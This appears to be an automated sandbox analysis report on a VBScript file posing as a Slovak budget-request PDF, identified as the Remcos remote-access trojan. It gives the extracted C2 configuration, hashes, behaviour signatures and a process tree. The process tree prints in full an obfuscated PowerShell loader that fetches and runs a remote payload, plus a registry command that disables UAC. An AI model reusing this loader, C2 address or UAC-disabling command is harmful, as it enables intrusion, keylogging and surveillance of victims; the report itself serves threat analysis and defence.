Overview

overview

10

Static

static

1

ŽIADOSŤ ...df.vbs

windows7-x64

10

ŽIADOSŤ ...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 09:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ŽIADOSŤ O ROZPOČET 28.11.2024·pdf.vbs

  • Size

    33KB

  • MD5

    25a7df33e8fee89dfef3426080405533

  • SHA1

    3bb1b11f8b041a59a4e8c498c88bbeae17d5f182

  • SHA256

    9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f

  • SHA512

    71fc9d9b64dce6f66941e63567c5eb89f57fb1e9caefbdb9fcd2eb1bb2bde1a98a4b156196b91f47834561a3178bb22665b513edb6b440bf313a39ae63f87b50

  • SSDEEP

    768:AxuasGxaSoM5LC3gWamt6iNi+ehBhZ+2JZ/q367gTeVVh0krL3uS:SuasQo2GZU+ehB/+WIQEmf0k3J

Score
10/10
remcosremotehostdiscoveryevasionrattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45hq459.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZP0CQ6

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ŽIADOSŤ O ROZPOČET 28.11.2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2800
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2940
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2180

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    0358dca026b142664c0602e3a6a601a7

    SHA1

    7f8f0124739bd67c858dfef742119ef4d40f2b65

    SHA256

    c39a12750c734c50c399d91dba0ffc7ca0d8522baa878fd3498b56dd37fb72de

    SHA512

    04a2aa1e3f33548ab0fca663037808c3e2c05ddbb9f672c516e9f91e63e871d7293bd6403a3bd0051a426a94320647596aacd14004187a42aa9a116d478f0754

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    0031323fda6298d4d9c42f0ad44a2917

    SHA1

    cb140f351f3da9219c287347d45d49405bee7f61

    SHA256

    6b764ac9d5ffe20fa4613e307736857a03833be32fd0858cde554a98d9a14c61

    SHA512

    30677c287e9ac650f51233c7972a695b88235fc94e0c7f14243ee3930488aac5527fa27f981acbba54708eaf54ccb18c826e9243177e8e1469001b51ec43be3c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab3C09.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarC0F0.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SMC820HYY7JEW3WEFCNS.temp
    Filesize

    7KB

    MD5

    fddc88a43de71c53f877a1bc548f7fd6

    SHA1

    fd3e24751cdf91506c62dfd13fe44cc01d818fb8

    SHA256

    02de2ba285a3a6d09bfb63e1b7859f4718cf569f8561098bd31f877721389b46

    SHA512

    2d959aca17fd0a3762e9051e51f37d14b8024aa7ecd4ee46cf84662b050326619395302b0ea197db7fed846bbee19d20585e3ad8f8d4b1b4a8ac0806c96bbb4c

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Skyggeboksningerne.Cha
    Filesize

    423KB

    MD5

    c1c6567f2739c2f038cdcb65ebee8a05

    SHA1

    e533d6a51fef763b4765cfc842d6f99e3937176a

    SHA256

    e4e15d42053d9d51a43c89b75aea7bd42a809d0a99535947219c208ff985b0eb

    SHA512

    175c6f4f3c60112c33c5fbeb5705291551edf6a39cab33bb0e48742de1bdb97ecdd2a8a25a39a4dfa4acc402d742a51c278961d966b489388c16480d7f3ebb88

    Download Submit

  • memory/2164-37-0x00000000067A0000-0x00000000078D9000-memory.dmp

    Filesize

    17.2MB

    Download

  • memory/2940-24-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-25-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-29-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-30-0x000007FEF674E000-0x000007FEF674F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2940-31-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-33-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-26-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-27-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-23-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2940-21-0x000000001B740000-0x000000001BA22000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2940-20-0x000007FEF674E000-0x000007FEF674F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3068-61-0x0000000000550000-0x00000000015B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3068-60-0x0000000000550000-0x00000000015B2000-memory.dmp

    Filesize

    16.4MB

    Download